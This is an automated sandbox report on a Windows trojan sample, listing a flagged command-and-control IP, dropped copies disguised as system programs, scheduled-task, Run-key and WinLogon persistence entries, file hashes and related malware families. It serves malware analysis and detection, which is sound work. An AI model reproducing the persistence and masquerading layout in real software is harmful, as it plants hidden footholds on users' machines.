            http://92.63.98.227StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000273A000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.0000000002791000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.0000000003116000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://92.63.98.227(StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000277A000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.0000000002791000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.0000000003116000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXPC5PMKegV.exe, 00000000.00000002.2128952828.0000000003169000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000273A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C68000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://go.mic5xMLVfJVxhYAkoCJ.exe, 00000022.00000002.2260234358.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            92.63.98.227
            		unknownRussian Federation
            		29182THEFIRST-ASRUtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1500508
            Start date and time:2024-08-28 15:31:07 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 41s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:42
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:XPC5PMKegV.exe
            renamed because original name is a hash value
            Original Sample Name:20cf7f39edef3db30f388829c5a3f05c.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@42/29@0/1
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 73%
            • Number of executed functions: 559
            • Number of non-executed functions: 8
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded IPs from analysis (whitelisted): 40.127.169.103, 20.166.126.56, 13.95.31.18
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, tile-service.weather.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, 6.d.a.8.b.e.f.b.0.0.0.0.0.0.0.0.4.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 5060 because it is empty
            • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 6320 because it is empty
            • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 6840 because it is empty
            • Execution Graph export aborted for target System.exe, PID 1600 because it is empty
            • Execution Graph export aborted for target System.exe, PID 1708 because it is empty
            • Execution Graph export aborted for target System.exe, PID 5764 because it is empty
            • Execution Graph export aborted for target XPC5PMKegV.exe, PID 4924 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 1912 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 5204 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 6248 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 6316 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 6684 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: XPC5PMKegV.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            09:32:17API Interceptor19x Sleep call for process: Registry.exe modified
            09:32:28API Interceptor18x Sleep call for process: StartMenuExperienceHost.exe modified
            09:32:34API Interceptor18x Sleep call for process: System.exe modified
            09:32:46API Interceptor18x Sleep call for process: xMLVfJVxhYAkoCJ.exe modified
            15:31:56Task SchedulerRun new task: xMLVfJVxhYAkoCJx path: "C:\Recovery\xMLVfJVxhYAkoCJ.exe"
            15:31:58Task SchedulerRun new task: Registry path: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:31:58Task SchedulerRun new task: RegistryR path: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:31:58Task SchedulerRun new task: StartMenuExperienceHost path: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:31:58Task SchedulerRun new task: StartMenuExperienceHostS path: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:31:58Task SchedulerRun new task: System path: "C:\Program Files (x86)\microsoft.net\System.exe"
            15:31:59Task SchedulerRun new task: SystemS path: "C:\Program Files (x86)\microsoft.net\System.exe"
            15:31:59Task SchedulerRun new task: xMLVfJVxhYAkoCJ path: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            15:32:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJ "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            15:32:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:32:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:32:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files (x86)\microsoft.net\System.exe"
            15:32:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJ "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            15:32:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:32:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:32:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files (x86)\microsoft.net\System.exe"
            15:33:06AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJ "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            15:33:14AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:33:22AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:33:30AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files (x86)\microsoft.net\System.exe"
            15:33:46AutostartRun: WinLogon Shell "C:\Recovery\xMLVfJVxhYAkoCJ.exe"
            15:33:55AutostartRun: WinLogon Shell "C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe"
            15:34:03AutostartRun: WinLogon Shell "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            THEFIRST-ASRU2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
            • 188.120.227.56
            http://ledger-devices-sync.vercel.app/Get hashmaliciousUnknownBrowse
            • 77.246.156.134
            Liquidation.Loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
            • 212.109.199.34
            http://www.goo.su/JpY9S/Get hashmaliciousUnknownBrowse
            • 80.87.194.210
            ExeFile (233).exeGet hashmaliciousEmotetBrowse
            • 78.24.219.147
            ExeFile (260).exeGet hashmaliciousEmotetBrowse
            • 78.24.219.147
            ExeFile (267).exeGet hashmaliciousEmotetBrowse
            • 37.46.129.215
            ExeFile (317).exeGet hashmaliciousEmotetBrowse
            • 78.24.219.147
            ExeFile (333).exeGet hashmaliciousEmotetBrowse
            • 37.46.129.215
            ExeFile (360).exeGet hashmaliciousEmotetBrowse
            • 78.24.219.147

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Program Files (x86)\Microsoft.NET\27d1bcfc3c54e0

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (776), with no line terminators
            Category:dropped
            Size (bytes):776
            Entropy (8bit):5.897167646645308
            Encrypted:false
            SSDEEP:24:yrIFNd2RSmgipxrUgV8jmYId2fZ+pUYISb1LEF:ywNd2d3Ly5Iqt81gF
            MD5:D675E989518B7EBE7AF118780F466FEC
            SHA1:0CD1D792A76142942459BE42C0C3E2FE45C1C7F0
            SHA-256:3DE2FC9164086599A674FF416E134F1027567736E756971009995D21030E2E76
            SHA-512:4806DAD8B59A0B7AA29E66C129126CF58818D8B2C7A09359C80E3235A445E88BC95A58CD95BE7A9F7BF43CBDCD3B3FA96CD472D3370FA8038F598FC56C37B15D
            Malicious:false
            Preview:Pq8WQ0n3opO8MGMQZAcXKv1sXZC29jdxNijg1YpPLVZyxBWvD8jPsCldyQ91xu4FLauogqYBUNLyVD4VCRzB9OFL7FrlZybabUmWQsOWkh5e0wIuVnyg52F6Vjqa8wmfwuXBaiFTCcbcTkUL76QvA4fjPpAqCxYx5ZsFZHUwheedbmnvOfdCg0f1PxvuhYROEng31Ow0mdOgaCImCPchUVRE400lVjPIMPYxGt39tmaCm8bNpJsR6u3sWb9AYKfCNFTKnUgSVdyr5Oc5Zn5M07McVpaou2kiHXygpQjUmZ6c6MxI9DlvPSMQ20y742id2PkiZ5PIDkjbBugJ2SoqRzTyKioyclau0ckqlOsDxcrotuOIUoFlN2LC6vX1RbqbJzkiJzinkl2yHoFaTfexgyh8Rht010vWwQe3Kq8eGcBlAX4Sp7iw625USmRmGrwt0fC1JLPng9qEx583mbK3S9Z3UJliYWYZpRveUDIer4Q7M1hWnX9og2a1FJgAjrOJlRYfJdjjTqMXscrdmO4AXu2x04ZLgI49qGW4dBNKyZV0qDImcDXUxNv0ZloOEXDLvMrmGwAkBuM7ZBHxwwtcujMcUfe2X8FbWJFdVfgpDxTDBybYd0cSnkaL9PRkSHNDovkP6ncQPEY7QJbgDGYggxxwt3dFN5W5jQZPNMc0YLCjLc50yvhMtrh08yfCJWDTrcXAuLT0nhHUvNkQ8nRcYKM2tiRYqZqBIs2tF5GncqiMjMEuOPEgFk5gQfQL34JO0GMCV1LC

            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\51c080b3bf3cc1

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (770), with no line terminators
            Category:dropped
            Size (bytes):770
            Entropy (8bit):5.903928876762416
            Encrypted:false
            SSDEEP:12:b3WrJ7b6qb8rN9rUfT2MwE8Ic/zCu7FMXen/+PtRVcjoduLtuJSjEcOFY1ElXMwZ:b3W1Sqb8762MSIJ8OVcjoitkQEsElXFZ
            MD5:5C5D484997454085A1CD860D30F8601A
            SHA1:3C145C6186269EB809CD482DE506B8AF5A9C17F6
            SHA-256:3BFC3D8045314723506562D7500C0EA80E420E0D61F66CA1C6FA86298D990B99
            SHA-512:1E211165E42F5918F3482A8257C299DE8CA155E51B3631F2C74442B21A9AE814C1DC7F84390B5391BFF943C41673885CCF1667B809673C449404E48E40360B33
            Malicious:false
            Preview:b8jdjwQHduFwgHs2B3cYDFXcKqXZaDEKDPDkgT0xPBZtIDLvjwNk63rWkGT3Y0raq4tRDIWsCoIBpnUHel0n0dOKhrAZ97YZU9DNU3rbafhRuqq6vMYxADkMqiuWI7sFQtrqkGwl3ZNV56a1BEnxikYQY1hvJVSdwcBB89VpZx4l0PQtI3UET4gqUaSsiBbhGuid5Y2Bs8YvqxaIkxmQAOJ16VqirmGYVWfGrxytASWVgu9h9JIvYLh1kqhjsTUF1AaUSUbx83Pr2yVLVIjheV9KznfAPOBr8QdgUpPorUwf5z8vVVOjuxkgAPeozbhu1itlVz1q34zKjeO9otp3Ab6Kq7fEKlzQwCnWFXageiqz7a6gAe9FvotZlj5YTwfSEiXh024RTJYcvGMPA9DqlufISNugcCMsCYvYDZpIkswmPQofWpXTtzqUDOOmHXzQ6qZWVyMkU4F3723CjPKwo39NraUyKCBM3fpi0RJhcx9ytxWKUMD1NCmCrMo5dXZR33AcMVLRGmT14Ke4DJe89K903n0omOEFXr50x489BvuksuIhsu1T3bRs3Jjjfgp2iOeMPnHJLf7OZYIIeT62WuL5ZM6nUYeeG2CdQ6REnrHYeDTeBbFLkwfxDiwDqdyxAcHhWo1iB2PonxbV3cm3TS4TWParJOXJ2UXB6vIWjhJsh0KPHaJO05esixKHOJYxeFwSZZZHTQTvILwgELjtEIS70ocIkAIZIWNbE1zsAC5kmsjWBoCDjptWwzcv6RgTI3

            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Program Files (x86)\Microsoft.NET\System.exe

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Microsoft.NET\System.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Program Files (x86)\Windows Defender\55b276f4edf653

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (712), with no line terminators
            Category:dropped
            Size (bytes):712
            Entropy (8bit):5.880260746129729
            Encrypted:false
            SSDEEP:12:ULDs9hp5sndQVdVk5pSAdfE1tUDZZ1ooz8Mgo2ADIXWUblyPTknRxz9t8ninLZZv:CDCHynmVdVEpRVEHUDZZ1okT3Du5ByPq
            MD5:A7A4B269B22707E5C195773217BC625E
            SHA1:B4299F1F84AD22886C7A7D09B2CA95923C1A75FA
            SHA-256:FB2AEB6EC6A9DBFAF4EEA421C0B6F4066F0904ED60EFFE087396E5B525EAC808
            SHA-512:9C4597F33BE59245F90CC35FF070642B21FB39F6654EB1B17124BD87026C0B5A6F1CAB8A5162D6CFBD792480376DFA68A73A2D3A70DF925740B1AE473C1B9DCE
            Malicious:false
            Preview:g2f6a0uDpHMzDLrzcZwlXpm2yPbUEw3NMRbgdHzGsaHeMtT7Tcv5WAU0PmIKZZ93O8mvtLVUjp27hIqE6eBlA80M6kQ09orSbOQNGhNIGaVqIXTH6DO4YX2QIayJ4fV58jfT1c8YR2ekmJDjRI36aw3DWAEpsENlFasi1AQdEznf2Sn8XP1vmYfLqc71YTqNp3eMbfsR2Z1kJYKDWGSdMc9q5g2ZDYFvJZ09xbh1hk2Mh5CRR3eRANAN4xR4mTOdTFathLQ5ia6mjwIAekHJ4xu6YnE9JnOOVY2ceSuGnitkRYnHoRZCLEjgUdU4GQv4LrQK4qfM0BgWEKpA96V2NMCRzWHA7z9WwyYjHdN8vNMKhNbKyU4K42q9p9VhiePACKjPvG3gtWHAA1tm47Mn4zb3HZ3HHqZR8LIXnMYraYaivq8xPsmlRlFMspHVMvYC7zCztW8sieMgY3HbaF1ZDy9WF5p7EDfp9Yk6nJE3u4CxZjyyip4H399J0qtxrAnf9ghATLyRB8oIvM7gH0ZZIXw9YbG6aQMtRgx2ByfW1nG5U1YntNq0lOXluhl2F10uv51OYEeTVDheR0phDcNMkWIDJLHeMmR9xWJZAJOosXehq3U32EzmooJZxxFN79Gswir5rPh3OidN1kXQ1NmHxoUJMtmMEBrtQvvHMYMmh5YGK6iMazVtX95HNit8nUzM0u6FzPDd

            C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (728), with no line terminators
            Category:dropped
            Size (bytes):728
            Entropy (8bit):5.8755850659553746
            Encrypted:false
            SSDEEP:12:uv2dtYGxAgG+ZfN3zygXq71kf1hHHTdQjRCrUFlA2azEPKVjw4pAeSOFj0J:uv2dtY2Gu5+gX39pJERzFlAVhVjwze5m
            MD5:D396354CA9CB861025303344358FBF9F
            SHA1:FC1872C6C048F40531FC9F40AE966998D470A932
            SHA-256:64114CAAE89F6C49ED48938D1343E70FD92764358F8FED0C969F9FF472BA9AAB
            SHA-512:CA4301371BA80A02773EDCB1C689BB1E97B4DD9985EF0F0DDE59FD40955EC5254A785DFA602F2FCB0AAD52FDC4D8676220500D2C0C47C288C5E3E331A1B7C0BB
            Malicious:false
            Preview:UFlYGjGylz9sBeobweOx3TkO8ysXUd5sxI9pU9ItgyEpSJO7GmGvh5zAeXaR0tdH4Q43e9GxVfQFP55zjuRsXJL2S9K7i02xU6vCOVdGfTaCouujclsGcuuvFCkeyIOfnduTJ3kORKMEtIOiOlf7IwUjMA6Mv8SXE5ZL9bZiBdySipB7xCQMnRW1ILHJ6YcT2z9xtDjxM66o7CBg89YtsFtxiiCxUPmmBeZtpNOuccArUs3GKkL69tlxFMPKAvd7UTncmR0uvnQPECc0o6ntDpnR3mnd8Duq8DXBEad2tbLWdVsDtZgEIt3opWj9oXvs3jQBpbvOcvAmdRyh4kujgpiPJsVs1dNWpdc3EqXSnSmWtQKYiBFDnMLOAB17FDW8ho7Ay4dNMb6ODLg3h6KzYJtcRO2DyaMj5nzFSJjni10LQ6Kzf8ZI3gkX4ftkBZYwPXTZWakYXgRgSiMUDDh0BEpYCbKxa9mIcE63nucEXAvXPDEWSYg72ivKr4X4Qx8X4IEOlTqSlddASSI9XxeBcoQ4TvLtXixkCXdH90u9sOWYEu1YvYhdS65P2J40H74Cp375zB9gCfTOR1zi3w79AURFcNOz541uTTtLw6jtYAawnq8AUW6U95CUl2clwKlHoi57Iow7NNlA3ebwPOfj7guYRYj4e86OYSIFvA2qj9HwTBbGaqWioCKHxhptE1dOQXlkWWAOWy98Z8EP7dexmYjW

            C:\Recovery\51c080b3bf3cc1

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):277
            Entropy (8bit):5.747584032409476
            Encrypted:false
            SSDEEP:6:KwjHpclaMU98l/VP18jJo32W6yfOqGOEuVOgaDZUdiPqwC:nHpaaMm866mZyfOqGOHDLdYO
            MD5:43480D051DA514765FDAB6DC98CC8009
            SHA1:2CF6409703B6FC974BC45A1896A4F0C0E94366FB
            SHA-256:4AB89A5DB967A7229253D86D662A1D67D4DA3D282DE03BF91C9A760C2FCA7C75
            SHA-512:98EBC13064B39467CCAF22FB50CB1623F64DEC667E0DDF17AC85DFDD53B41A726E4CFED2C7D792CDF1BEF471CF701AB32F9E5F05D43E21308071A91A8A06709E
            Malicious:false
